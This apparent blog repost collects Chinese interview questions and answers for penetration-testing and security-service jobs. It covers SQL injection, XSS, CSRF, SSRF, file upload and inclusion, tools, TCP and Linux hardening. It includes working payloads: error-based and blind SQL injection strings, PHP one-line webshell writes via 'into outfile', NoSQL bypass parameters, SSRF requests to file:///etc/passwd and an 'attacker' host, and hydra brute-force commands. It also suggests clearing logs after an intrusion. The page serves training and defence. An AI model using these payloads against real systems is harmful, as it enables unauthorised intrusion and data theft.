失眠网,内容丰富有趣,生活中的好帮手!
失眠网 > 【吐血整理】(面试大全)网络安全 渗透测试 安全服务工程师面试题

【吐血整理】(面试大全)网络安全 渗透测试 安全服务工程师面试题

时间:2022-02-13 17:15:56

相关推荐

【吐血整理】(面试大全)网络安全 渗透测试 安全服务工程师面试题

欢迎关注我的微信公众号:安全攻防渗透

信息安全领域原创公号,专注信安领域人才培养和知识分享,致力于帮助叁年以下信安从业者的学习和成长。

前言

这次花了大把精力一边学习一边整理网络安全服务职位(包括但不仅限于:安全服务工程师,安全运营工程师,安全运维工程师,安全攻防工程师“)的面试问题。

话不多说,让我们一起学习吧

目前来说还有非常多的不严谨和冗余,恳请小伙伴们指正修改!

owasp 漏洞都有哪些?

1、SQL注入防护方法:

2、失效的身份认证和会话管理

3、跨站脚本攻击XSS

4、直接引用不安全的对象

5、安全配置错误

6、敏感信息泄露

7、缺少功能级的访问控制

8、跨站请求伪造CSRF

9、使用含有已知漏洞的组件

10、未验证的重定向和转发

常见的Web安全漏洞

SQL注入XSS文件遍历、文件上传、文件下载垂直越权、水平越权逻辑漏洞

首先对于新人来说,大多数同学都是没有实战经验的,对应面试官提问聊聊你的渗透测试实战,但很多人却无从开口。

小伙伴们可以阅读如下文章进行构思编撰实战经历(狗头):

记一次渗透测试实战

渗透测试流程相关

给你一个网站你是如何来渗透测试的?

在获取书面授权的前提下。

1)信息收集,

1,获取域名的whois信息,获取注册者邮箱姓名电话等。

2,查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。

3,查看服务器操作系统版本,web中间件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞

4,查看IP,进行IP地址端口扫描,对响应的端口进行漏洞探测,比如 rsync,心脏出血,mysql,ftp,ssh弱口令等

5,扫描网站目录结构,看看是否可以遍历目录,或者敏感文件泄漏,比如php探针

6,google hack 进一步探测网站的信息,后台,敏感文件

2)漏洞扫描

开始检测漏洞,如XSS,XSRF,sql注入,代码执行,命令执行,越权访问,目录读取,任意文件读取,下载,文件包含,

远程命令执行,弱口令,上传,编辑器漏洞,暴力破解等

3)漏洞利用

利用以上的方式拿到webshell,或者其他权限

4)权限提升

提权服务器,比如windows下mysql的udf提权,serv-u提权,windows低版本的漏洞,如iis6,pr,巴西烤肉,

linux藏牛漏洞,linux内核版本漏洞提权,linux下的mysql system提权以及oracle低权限提权

5) 日志清理

6)总结报告及修复方案

渗透测试流程

项目访谈信息收集:whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息漏洞扫描:Nessus, AWVS手动挖掘:逻辑漏洞验证漏洞修复建议(如果有)基线检查/复验漏洞输出报告 概述测试基本信息 测试范围测试时间测试任务测试过程 信息安全风险综合分析 整体风险分析风险影响分析系统安全分析安全漏洞列表 解决方案建议复测报告

SQL面试题

SQL注入类型

基于报错注入基于布尔的注入,根据返回页面判断条件真假的注入基于时间的盲注,不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。宽字节注入联合查询,可以使用 union 的情况下的注入。堆查询注入,可以同时执行多条语句的执行时的注入。

SQL注入的原理

通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。通常未经检查或者未经充分检查的用户输入数据或代码编写问题,意外变成了代码被执行。

如何进行SQL注入的防御

关闭应用的错误提示

加waf

对输入进行过滤

限制输入长度

限制好数据库权限,drop/create/truncate等权限谨慎grant

预编译好sql语句,python和Php中一般使用?作为占位符。这种方法是从编程框架方面解决利用占位符参数的sql注入,只能说一定程度上防止注入。还有缓存溢出、终止字符等。

数据库信息加密安全(引导到密码学方面)。不采用md5因为有彩虹表,一般是一次md5后加盐再md5

清晰的编程规范,结对/自动化代码 review ,加大量现成的解决方案(PreparedStatement,ActiveRecord,歧义字符过滤, 只可访问存储过程 balabala)已经让 SQL 注入的风险变得非常低了。

具体的语言如何进行防注入,采用什么安全框架

作者:没啥意思

链接:/question/22953267/answer/23222069

来源:知乎

SQL注入问题既不能“靠用户(开发者也是用户)的自觉去避免”,也不能完全脱离用户(开发者也是用户)而指望数据库层面去避免。对于那些不了解SQL注入漏洞细节或不关心SQL注入漏洞或没精力去关心SQL注入漏洞的工程师,你要给他们一条尽可能简单可行透明的方案来避免SQL注入漏洞,告诉他这样写就可以了,这就是安全框架;然后告诉他或者让他的老大告诉他你必须这样写,这就是安全编码规范;然后你有手段在他没有这样写的时候能够检查出来(这比检查出漏洞要容易)并推动他改正,这就是白盒检查。

我们现在的互联网产品SQL注入漏洞仍然层出不穷,并不是这套思路有问题,相反恰恰是这套思路没有完善。一方面是框架方案本身不完善,以SQL注入漏洞为例,参数化是防SQL注入框架级方案的重要部分,但仅靠参数化没法很好满足开发过程中一些常见需求,如逗号分割的id列表问题、排序标记的问题等等(其实这些问题真要用参数化的方案解决也可以),使得开发更愿意在这些地方使用非参数化或伪参数化的方法(比如拼接SQL片段后再把整个片段当作参数扔进去exec)。这些问题在参数化的基础上,再加以改进,仍然守着拼接SQL片段时进行强类型转换的思路,仍然是能很好解决的,也就是继续完善参数化方案的问题,而不是看上去那样“参数化解决不了问题”。另一方面,安全编码规范的制定、培训、流程建设和实施保证上也做得远远不到位,开发leader们更希望后面的数据库或者前面的安全防御上能有手段去解决SQL注入问题,对于安全工程师来说,设置并维护几个特征串、语法分析场景也远比做那些安全框架、编码规范、白盒扫描来得要轻松实在,彼此在心照不宣中度过今天,自然不能指望明天能彻底踏实。

sqlmap,怎么对一个注入点注入?

1)如果是get型号,直接,sqlmap -u “诸如点网址”.

2) 如果是post型诸如点,可以sqlmap -u "注入点网址” --data=“post的参数”

3)如果是cookie,X-Forwarded-For等,可以访问的时候,用burpsuite抓包,注入处用*号替换,放到文件里,然后sqlmap -r “文件地址”

mysql的网站注入,5.0以上和5.0以下有什么区别?

前就出了5.0,现在都到5.7了,没啥意义的问题

5.0以下没有information_schema这个系统表,无法列表名等,只能暴力跑表名。5.0以下是多用户单操作,5.0以上是多用户多操做。

MySQL存储引擎?

InnoDB:主流的存储引擎。支持事务、支持行锁、支持非锁定读、支持外键约束 为MySQL提供了具有提交、回滚和崩溃恢复能力的事物安全(ACID兼容)存储引擎。InnoDB锁定在行级并且也在 SELECT语句中提供一个类似Oracle的非锁定读。这些功能增加了多用户部署和性能。在SQL查询中,可以自由地将InnoDB类型的表和其他MySQL的表类型混合起来,甚至在同一个查询中也可以混合InnoDB存储引擎为在主内存中缓存数据和索引而维持它自己的缓冲池。InnoDB将它的表和索引在一个逻辑表空间中,表空间可以包含数个文件(或原始磁盘文件)。这与MyISAM表不同,比如在MyISAM表中每个表被存放在分离的文件中。InnoDB表可以是任何尺寸,即使在文 件尺寸被限制为2GB的操作系统上InnoDB支持外键完整性约束,存储表中的数据时,每张表的存储都按主键顺序存放,如果没有显示在表定义时指定主键,InnoDB会为每一行生成一个6字节的ROWID,并以此作为主键 MyISAM:访问速度快,不支持事务,逐渐被淘汰MEMORY:BTREE索引或者HASH索引。将表中数据放在内存中,并发性能差。information_schema用的是该引擎MERGE、Archive等等不常用的

什么是事务?

事务是一组原子性的SQL语句或者说是一个独立的工作单元,如果数据库引擎能够成功对数据库应用这组SQL语句,那么就执行,如果其中有任何一条语句因为崩溃或其它原因无法执行,那么所有的语句都不会执行。也就是说,事务内的语句,要么全部执行成功,要么全部执行失败。

举个银行应用的典型例子:

假设银行的数据库有两张表:支票表和储蓄表,现在某个客户A要从其支票账户转移2000元到其储蓄账户,那么至少需求三个步骤:

a.检查A的支票账户余额高于2000元;

b.从A的支票账户余额中减去2000元;

c.在A的储蓄账户余额中增加2000元。

这三个步骤必须要打包在一个事务中,任何一个步骤失败,则必须要回滚所有的步骤,否则A作为银行的客户就可能要莫名损失2000元,就出问题了。这就是一个典型的事务,这个事务是不可分割的最小工作单元,整个事务中的所有操作要么全部提交成功,要么全部失败回滚,不可能只执行其中一部分,这也是事务的原子性特征。

读锁和写锁

读锁是共享的,即相互不阻塞的,多个客户在同一时刻可以读取同一资源,互不干扰。写锁是排他的,即一个写锁会阻塞其它的写锁和读锁,只有这样,才能确保给定时间内,只有一个用户能执行写入,防止其它用户读取正在写入的同一资源。写锁优先级高于读锁。

MySQL的索引

索引是帮助MySQL高效获取数据的数据结构。MYISAM和InnoDB存储引擎只支持BTree索引;MEMORY和HEAP储存引擎可以支持HASH和BTREE索引。

ORDER BY在注入的运用

order by后面可以加字段名,表达式和字段的位置,字段的位置需要是整数型。

GPC是什么?GPC之后怎么绕过?

如果magic_quotes_gpc=On,PHP解析器就会自动为post、get、cookie过来的数据增加转义字符“\”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符(认为是php的字符)引起的污染。

Mysql一个@和两个@什么区别

@为用户变量,使用SET @var1=1赋值@@ 为系统变量 ,包括全局变量show global variables \G;和会话变量show session variables \G;

注入/绕过常用的函数

基于布尔SQL盲注left(database(),1)>'s'ascii(substr((select table_name information_schema.tables where tables_schema=database()limit 0,1),1,1))=101 --+ascii(substr((select database()),1,1))=98ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23regexp正则注入select user() regexp '^[a-z]';select user() like 'ro%'基于报错的SQL盲注

1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】

2)通过floor报错 向下取整

3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)

4).geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5).multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6).polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7).multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8).linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9).multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10).exp()select * from test where id=1 and exp(~(select * from(select user())a));延时注入如何来判断?

if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

盲注和延时注入的共同点?

都是一个字符一个字符的判断

如何拿一个网站的webshell?

上传,后台编辑模板,sql注入写文件,命令执行,代码执行,

一些已经爆出的cms漏洞,比如dedecms后台可以直接建立脚本文件,wordpress上传插件包含脚本文件zip压缩包等

sql注入写文件都有哪些函数?

select ‘一句话’ into outfile ‘路径’

select ‘一句话’ into dumpfile ‘路径’

select ‘<?php eval($_POST[1]) ?>’ into dumpfile ‘d:\wwwroot\\nvhack.php’;

各种写shell的问题

写shell用什么函数?select '<?php phpinfo()> into outfile 'D:/shelltest.php'dumpfilefile_put_contentsoutfile不能用了怎么办?select unhex('udf.dll hex code') into dumpfile 'c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll';可以UDF提权 /milantgh/p/5444398.htmldumpfile和outfile有什么不一样?outfile适合导库,在行末尾会写入新行并转义,因此不能写入二进制可执行文件。sleep()能不能写shell?写shell的条件? 用户权限目录读写权限防止命令执行:disable_functions,禁止了disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,但是可以用dl扩展执行命令或者ImageMagick漏洞 /imagemagic-bypass-disable_function.htmlopen_basedir: 将用户可操作的文件限制在某目录下

sql注入写文件都有哪些函数?

select ‘一句话’ into outfile ‘路径’

select ‘一句话’ into dumpfile ‘路径’

select ‘<?php eval($_POST[1]) ?>’ into dumpfile ‘d:\wwwroot\\nvhack.php’;

sql二次注入

第一次进行数据库插入数据的时候,仅仅只是使用了addslashes或者是借助get_magic_quotes_gpc对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身还是脏数据。

在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。

交友网站,填写年龄处是一个注入点,页面会显示出与你相同年龄的用户有几个。使用and 1=1确定注入点,用order by探测列数,union select探测输出点是第几列,

暴库group_concat(schema_name) from information_schema.schemata暴表group_concat(table_name) from information_schema.schemata where table_schema='hhh'获取数据concat(flag) from flag

修复:在从数据库或文件中取数据的时候,也要进行转义或者过滤。

SQL和NoSQL的区别

SQL关系型数据库,NoSQL(Not only SQL)非关系型数据库

SQL优点

关系型数据库是指用关系数学模型来表示的数据,其中是以二维表的形式描述数据。

结构稳定,不易修改,常用联表查询查询能力高,可以操作很复杂的查询一致性高,处理数据会使用封锁保证数据不被改变表具有逻辑性,易于理解

SQL缺点

不适用高并发读写不适用海量数据高效读写层次多,扩展性低维护一致性开销大涉及联表查询,复杂,慢

NoSQL优点

采用键值对存储数据

由于数据之间没有关系,所以易扩展,也易于查询数据结构灵活,每个数据都可以有不同的结构由于降低了一致性的要求,所以查询速度更快

比较

非关系型数据库的产生是因为随着网站的进化,并发性增加,扩展性高,一致性要求降低。这样关系型数据库最重要的一致性维护就显得有点多余,并且消耗着性能。因此有了非关系型数据库,它可以算是关系型数据库的一种弱化的结果,在海量数据存储和查询上更胜一筹。

两种数据库没有好坏之分,只是使用的环境不一样。关系型数据库可以说是更严谨的,可靠性更强的数据库,在对于数据精度要求高的环境,比如说银行系统这样自然是像mysql这样的数据库适合。非关系型数据库胜在处理大数据的速度,但是对于数据的准确度没有那么高,对于操作量大的环境比如当前大部分web2.0的网站更加适用一些。

MongoDB注入方式

利用正则:找到y开头的namedb.items.find({name: {$regex: "^y"}})

一些payload

?login[$regex]=^&password[$regex]=^?login[$not][$type]=1&password[$not][$type]=1

XSS CSRF XXE SSRF

CSRF 和 XSS 和 XXE 有什么区别,以及修复方式?

xss学习 /?s=+%E9%82%A3%E4%BA%9B%E5%B9%B4%E6%88%91%E4%BB%AC%E4%B8%80%E8%B5%B7%E5%AD%A6XSS+

XSS是跨站脚本攻击,用户提交的数据中可以构造代码来执行,从而实现窃取用户信息等攻击。修复方式:对字符实体进行转义、使用HTTP Only来禁止JavaScript读取Cookie值、输入时校验、浏览器与Web应用端采用相同的字符编码。

CSRF是跨站请求伪造攻击,XSS是实现CSRF的诸多手段中的一种,是由于没有在关键操作执行时进行是否由用户自愿发起的确认。修复方式:筛选出需要防范CSRF的页面然后嵌入Token、再次输入密码、检验Referer.

XXE是XML外部实体注入攻击,XML中可以通过调用实体来请求本地或者远程内容,和远程文件保护类似,会引发相关安全问题,例如敏感文件读取。修复方式:XML解析库在调用时严格禁止对外部实体的解析。

如何防止CSRF?

1,验证referer

2,验证token

详细:浅谈cnode社区如何防止csrf攻击 - CNode技术社区

CSRF、SSRF和重放攻击有什么区别?

CSRF是跨站请求伪造攻击,由客户端发起SSRF是服务器端请求伪造,由服务器发起重放攻击是将截获的数据包进行重放,达到身份认证等目的

啥是同源策略,跨域有几种方式?

/blog//04/same-origin-policy.html

浏览器安全的基石是"同源政策",目的是为了保证用户的信息安全,防止恶意网站窃取数据,避免cookie共享。同源含义是协议、域名、端口相同的两个网页才可以共用cookie。目前如果非同源,有三种行为收到限制:

- Cookie、LocalStorage 和 IndexDB 无法读取。

- DOM 无法获得。

- AJAX 请求不能发送

如何规避同源策略?

JSONP

向服务器请求json数据回调,一般请求URL会加上&callback=xx

foo({"ip": "8.8.8.8"});

由于<script>元素请求的脚本,直接作为代码运行。这时,只要浏览器定义了foo函数,该函数就会立即调用。作为参数的JSON数据被视为JavaScript对象,而不是字符串,因此避免了使用JSON.parse的步骤。

JSONP的劫持

//03/jsonp_security_technic/

防御:

验证 JSON 文件调用的来源( Referer ),但是Referer 过滤(正则)不严谨、空 Referer也不行随机token

WebSocket

WebSocket是一种通信协议,使用ws://(非加密)和wss://(加密)作为协议前缀。该协议不实行同源政策,只要服务器支持,就可以通过它进行跨源通信。

CORS(重点)

/blog//04/cors.html

CORS是跨源资源分享(Cross-Origin Resource Sharing)的缩写。它是W3C标准,是跨源AJAX请求的根本解决方法。相比JSONP只能发GET请求,CORS允许任何类型的请求。

CORS请求大致和ajax请求,但是在头信息中加上了Origin字段表明请求来自哪个源。如果orgin是许可范围之内的话,服务器返回的响应会多出Acess-Control-Allow-*的字段

与JSONP的比较

CORS与JSONP的使用目的相同,但是比JSONP更强大。

JSONP只支持GET请求,CORS支持所有类型的HTTP请求。JSONP的优势在于支持老式浏览器,以及可以向不支持CORS的网站请求数据。

DOM XSS与反射XSS有啥不同,给你10s,如何快速判断一个XSS是否是DOM XSS?

/question/26628342

存储型XSS:你发送一次带XSS代码的请求,以后这个页面的返回包里都会有XSS代码;

反射型XSS:你发送一次带XSS代码的请求,只能在当前返回的数据包中发现XSS代码;

DOM型XSS:你发送一次带XSS代码的请求,在返回包里压根儿就找不到XSS代码的影子;

CSP策略

/question/21979782

浏览器内容安全策略,减少xss攻击。

SSRF漏洞原理是什么?利用时有哪些伪协议?

/archives/65832.html

漏洞原理

利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务。

ssrf用处

探测内网信息,用协议探ftp%26ip={ip}%26port={port}攻击内网或本地其他服务穿透防火墙

漏洞处

能够对外发起网络请求的地方请求远程服务器资源的地方数据库内置功能邮件系统文件处理在线处理工具

举几个例子:

在线识图,在线文档翻译,分享,订阅等,这些有的都会发起网络请求。根据远程URL上传,静态资源图片等,这些会请求远程服务器的资源。数据库的比如mongodb的copyDatabase函数,这点看猪猪侠讲的吧,没实践过。邮件系统就是接收邮件服务器地址这些地方。文件就找ImageMagick,xml这些。从URL关键字中寻找,比如:source,share,link,src,imageurl,target等。

绕过姿势

@127.0.0.1利用IP地址的省略写法绕过,[::]绕过localhostDNS解析 http://127.0.0.1.xip.io/ 可以指向任意ip的域名:xip.io利用八进制IP地址绕过,利用十六进制IP地址,绕过利用十进制的IP地址绕过

利用协议

/archives/70471.html

接受ua为curl的时候,支持的协议有

使用curl -v /ssrf.php?url=sxxx

file://ssrf.php?url=file:///etc/passwordDict://dict://<user-auth>@<host>:<port>/d:<word>ssrf.php?url=dict://attacker:11111/SFTP://ssrf.php?url=sftp://:11111/TFTP://ssrf.php?url=tftp://:12346/TESTUDPPACKETLDAP://ssrf.php?url=ldap://localhost:11211/%0astats%0aquitGopher://

漏洞修复

/PYTHON/defend-ssrf-vulnerable-in-python.html

检查是否为内网IP地址

绕过方法:

利用八进制IP地址绕过

利用十六进制IP地址绕过

利用十进制的IP地址绕过

利用IP地址的省略写法绕过

最好的做法:IP地址转换为整数再进行判断

获取真正请求的host

如何正确的获取用户输入的URL的Host?

最常见的就是,使用http://233.233.233.233@10.0.0.1:8080/、http://10.0.0.1#233.233.233.233这样的URL,让后端认为其Host是233.233.233.233,实际上请求的却是10.0.0.1。这种方法利用的是程序员对URL解析的错误,有很多程序员甚至会用正则去解析URL。使用urllib.parse可以解析真正的hostname

只要Host只要不是内网IP即可吗?

host可能为ip,可能为域名,利用xip.io绕过。方法:判断是否为http协议,获取url的host,再解析该host,将解析到的ip再进行检查

只要Host指向的IP不是内网IP即可吗?

不一定,可能会30x跳转

归纳

解析目标URL,获取其Host

解析Host,获取Host指向的IP地址

检查IP地址是否为内网IP

请求URL

如果有跳转,拿出跳转URL,执行1

在浏览器端,Referer可以篡改吗?

通过插件修改,一般抓包修改

xss盲打到内网服务器的利用

xss代码层防御

文件上传 文件包含漏洞

文件上传漏洞原理

由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件

常见的上传绕过方式

前端js验证:禁用js/burp改包大小写双重后缀名过滤绕过 pphphp->php防护文件上传目录设置为不可执行使用白名单判断文件上传类型 用随机数改写文件名和路径

审查上传点的元素有什么意义?

有些站点的上传文件类型的限制是在前端实现的,这时只要增加上传类型就能突破限制了。

文件包含原理

引入一段用户能控制的脚本或代码,并让服务器端执行 (1)include等函数通过动态变量的方式引入需要包含的文件; (2)用户能够控制该动态变量。

类型

本地文件包含远程文件包含 :即加载远程文件,在php.ini中开启allow_url_includeallow_url_fopen选项。开启后可以直接执行任意代码。

PHP文件包含函数

include():使用此函数,只有代码执行到此函数时才将文件包含进来,发生错误时只警告并继续执行。

inclue_once():功能和前者一样,区别在于当重复调用同一文件时,程序只调用一次。

require():使用此函数,只要程序执行,立即调用此函数包含文件,发生错误时,会输出错误信息并立即终止程序。

require_once():功能和前者一样,区别在于当重复调用同一文件时,程序只调用一次。

本地文件包含

能够打开并包含本地文件的漏洞,被称为本地文件包含漏洞

你常用的渗透工具有哪些,最常用的是哪个?

扫描:Nessus,AWVS,Nikto

SQLmap

/ski_12/article/details/58188331

常用参数

-u 单个URL -m xx.txt 多个URL-d "mysql://user:password@10.10.10.137:3306/dvwa" 作为服务器客户端,直接连接数据库--data post/get都适用-p 指定扫描的参数-r 读取文件-f 指纹信息--tamper 混淆脚本,用于应用层过滤--cookie --user-agent --host等等http头的修改--threads 并发线程 默认为1--dbms MySQL<5.0> 指定数据库或版本–level=LEVEL 执行测试的等级(1-5,默认为 1)–risk=RISK 执行测试的风险(0-3,默认为 1) Risk升高可造成数据被篡改等风险–current-db / 获取当前数据库名称–dbs 枚举数据库管理系统数据库–tables 枚举 DBMS 数据库中的表–columns 枚举 DBMS 数据库表列-D DB 要进行枚举的数据库名-T TBL 要进行枚举的数据库表-C COL 要进行枚举的数据库列-U USER 用来进行枚举的数据库用户

常用的tamper

本地:sqlmap-tamper分类.xlsx

base64encode.py #转为b64编码charencode.py url编码chardoubleencode.py 双URL编码unmagicquotes.py 宽字节randomcomments.py 用/**/分割SQL关键字space2plus.py space2comment.py space2xxxx.py 替换空格为xx

Nmap

nmap hostname/ip或者多个ip或者子网192.168.123.*-iL ip.txt 扫描ip.txt的所有ip-A 包含了-sV,-O,探测操作系统信息和路由跟踪。一般不用,是激烈扫描-O 探测操作系统信息-sV 查找主机服务版本号-sA 探测该主机是否使用了包过滤器或防火墙-sS 半开扫描,一般不会记入日志,不过需要root权限。-sT TCP connect()扫描,这种方式会在目标主机的日志中记录大批的链接请求以及错误信息。-sP ping扫描,加上这个参数会使用ping扫描,只有主机存活,nmap才会继续扫描,一般最好不加,因为有的主机会禁止ping,却实际存在。-sN TCP空扫描-F 快速扫描-Pn 扫描之前不使用ping,适用于防火墙禁止ping,比较有用。-p 指定端口/端口范围-oN 将报告写入文件-v 详细信息-T<0-5> 设定速度

Nmap还可以用到爆破等一些脚本

--script all 使用所有脚本--script=sql.injection.nse sql注入--script="smb*" 扫smb系列

Metasploit

使用内置模块。HR:常用的模块有哪些?

tcp反向链接 msfvenom

Hydra

密码爆破工具,FTP,MSSQL,MYSQL,POP3,SSH,rdp,

hydra IP -l loginname -P pass.txt PROTROCLhydra 127.0.0.1 -l root -P pass.txt ssh

kali信息收集工具

digwhoishost:查询dns服务器nslookup域名枚举:fierse -dnsmaltegoonesixtyone

流量分析WireShark

HTTP协议

TCP三次握手四次挥手

三次握手

客户端 syn 发送到服务端,变成 SYN_SENT 状态服务端 ack=syn+1 回传syn到客户端,变成SYN_RECV状态客户端 ack=syn+1, 变成ESTABLISHED状态,传输给服务端服务端收到ACK后变成ESTABLISHED状态,建立连接

SYN标志位为表示请求连接,ACK表示确认

四次挥手

客户端=主动关闭方

客户端FIN->服务端服务端ACK=FIN+1->客户端,服务端到客户端的连接关闭服务端FIN->客户端客户端ACK=FIN+1->服务端

假设Client端发起中断连接请求,也就是发送FIN报文。Server端接到FIN报文后,意思是说"我Client端没有数据要发给你了",但是如果你还有数据没有发送完成,则不必急着关闭Socket,可以继续发送数据。所以你先发送ACK,“告诉Client端,你的请求我收到了,但是我还没准备好,请继续你等我的消息”。这个时候Client端就进入FIN_WAIT状态,继续等待Server端的FIN报文。当Server端确定数据已发送完成,则向Client端发送FIN报文,“告诉Client端,好了,我这边数据发完了,准备好关闭连接了”。Client端收到FIN报文后,"就知道可以关闭连接了,但是他还是不相信网络,怕Server端不知道要关闭,所以发送ACK后进入TIME_WAIT状态,如果Server端没有收到ACK则可以重传。“,Server端收到ACK后,“就知道可以断开连接了”。Client端等待了2MSL后依然没有收到回复,则证明Server端已正常关闭,那好,我Client端也可以关闭连接了。Ok,TCP连接就这样关闭了!

MSL=最大段寿命=TTL=最大生存时间=255s

四层模型

应用层

应用层对应于OSI参考模型的高层,为用户提供所需要的各种服务,例如:FTP、Telnet、DNS、SMTP等.传输层

传输层对应于OSI参考模型的传输层,为应用层实体提供端到端的通信功能,保证了数据包的顺序传送及数据的完整性。该层定义了两个主要的协议:传输控制协议(TCP)和用户数据报协议(UDP).

TCP协议提供的是一种可靠的、通过“三次握手”来连接的数据传输服务;而UDP协议提供的则是不保证可靠的(并不是不可靠)、无连接的数据传输服务.网际互联层

网际互联层对应于OSI参考模型的网络层,主要解决主机到主机的通信问题。它所包含的协议设计数据包在整个网络上的逻辑传输。注重重新赋予主机一个IP地址来完成对主机的寻址,它还负责数据包在多种网络中的路由。该层有三个主要协议:网际协议(IP)、互联网组管理协议(IGMP)和互联网控制报文协议(ICMP)。

IP协议是网际互联层最重要的协议,它提供的是一个可靠、无连接的数据报传递服务。网络接入层(即主机-网络层)

网络接入层与OSI参考模型中的物理层和数据链路层相对应。它负责监视数据在主机和网络之间的交换。事实上,TCP/IP本身并未定义该层的协议,而由参与互连的各网络使用自己的物理层和数据链路层协议,然后与TCP/IP的网络接入层进行连接。地址解析协议(ARP)工作在此层,即OSI参考模型的数据链路层。

当你输入一个网址,点击访问,会发生什么?

查找DNS记录

查看浏览器缓存查看系统缓存查看路由器缓存查找ISP DNS缓存递归搜索。根据网址,发送一个DNS请求,UDP请求,端口为543,会请求一个DNS服务器,DNS服务器会不断递归查找这个网址的IP

建立连接

跟获取到的IP建立TCP连接,在TCP连接上发送HTTP报文

Linux运维

启动过程

Linux基线规范

每个公司有每个公司的基线规范体系,但是答题分为下列五个方面

账号管理和授权

检查特殊账号,是否存在空密码的账户和root权限账户禁用或删除无用账号添加口令策略:/etc/login.defs修改配置文件,设置过期时间、连续认证失败次数禁止root远程登录,限制root用户直接登录。检查su权限。vi /etc/pam.d/su添加auth required pam_wheel.so group=test

服务

关闭不必要的服务SSH服务安全 不允许root账号直接登录系统,PermitRootLogin=no修改SSH使用的协议版本为2修改允许密码错误次数(默认6次),MaxAuthTries=3

文件系统

设置umask值vi /etc/profile添加行umask 027设置登录超时vi /etc/profile修改配置文件,将以TMOUT=开头的行注释,设置为TMOUT=180

日志

启用syslogd日志,配置日志目录权限,或者设置日志服务器记录所有用户的登录和操作日志,通过脚本代码实现记录所有用户的登录操作日志,防止出现安全事件后无据可查。/help/zh/faq-detail/49809.htm

IP协议安全要求

远程登录取消telnet采用ssh设置/etc/hosts.allow和deny禁止ICMP重定向禁止源路由转发防ssh破解,iptables(对已经建立的所有链接都放行,限制每分钟连接ssh的次数)+denyhost(添加ip拒绝访问)

中间件基线规范(APACHE)

/help/zh/faq-detail/52981.htm

配置

账号授权日志session过期时间(防ddos绑定监听地址

禁止

目录权限访问外部文件CGI非法HTTP方法(PUT DELETE)

隐藏

服务版本号重定向错误页面

删除

配置文件默认安装的无用文件

webshell检测思路

/u011066706/article/details/51175971

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。

黑客通过浏览器以HTTP协议访问Web Server上的一个CGI文件,是一个合法的TCP连接,TCP/IP的应用层之下没有任何特征,只能在应用层进行检测。黑客入侵服务器,使用webshell,不管是传文件还是改文件,必然有一个文件会包含webshell代码,很容易想到从文件代码入手,这是静态特征检测;webshell运行后,B/S数据通过HTTP交互,HTTP请求/响应中可以找到蛛丝马迹,这是动态特征检测。

静态检测

静态检测通过匹配特征码,特征值,危险函数函数来查找webshell的方法,只能查找已知的webshell,并且误报率漏报率会比较高,但是如果规则完善,可以减低误报率,但是漏报率必定会有所提高。

优点是快速方便,对已知的webshell查找准确率高,部署方便,一个脚本就能搞定。缺点漏报率、误报率高,无法查找0day型webshell,而且容易被绕过。

静态检测配合人工

一个检查工具 /he1m4n6a/findWebshell

动态检测

Linux下就是nobody用户起了bash,Win下就是IIS User启动cmd,这些都是动态特征。再者如果黑客反向连接的话,那很更容易检测了,Agent和IDS都可以抓现行。Webshell总有一个HTTP请求,如果我在网络层监控HTTP,并且检测到有人访问了一个从没反问过得文件,而且返回了200,则很容易定位到webshell,这便是http异常模型检测,就和检测文件变化一样,如果非管理员新增文件,则说明被人入侵了。

缺点也很明显,黑客只要利用原文件就很轻易绕过了,并且部署代价高,网站时常更新的话规则也要不断添加。

日志检测

使用Webshell一般不会在系统日志中留下记录,但是会在网站的web日志中留下Webshell页面的访问数据和数据提交记录。日志分析检测技术通过大量的日志文件建立请求模型从而检测出异常文件,称之为:HTTP异常请求模型检测。

语法检测

实现关键危险函数的捕捉方式

统计学检测

webshell由于往往经过了编码和加密,会表现出一些特别的统计特征,根据这些特征统计学习。

典型的代表: NeoPI – /Neohapsis/NeoPI

防范webshell

/nohaoye/article/details/46987587

防范的措施大概有三种,第一种的思路是将专门存放上传文件的文件夹里面的脚本类型文件,解析成其他类型的文件,服务器不会以脚本类型来执行它。第二种是匹配文件夹里的脚本类型文件,将其设置为无法读取及操作。第三种是将文件上传到一个单独的文件夹,给一个二级的域名,然后不给这个虚拟站点解析脚本的权限,听说很多网站都用这种方式。

计划任务

/kx_nullpointer/article/details/21299873

atbatchcrontabanacron:检测停机期间应该执行但是没有执行的任务,将检测到的任务检测一次

自动化运维编写过什么脚本

yum用的什么源(本地自搭,挂载)

awk sed的使用

排错思路,排错经验

网络 防火墙 配置 权限

日志分析ELK的使用和分析

/question/21427267

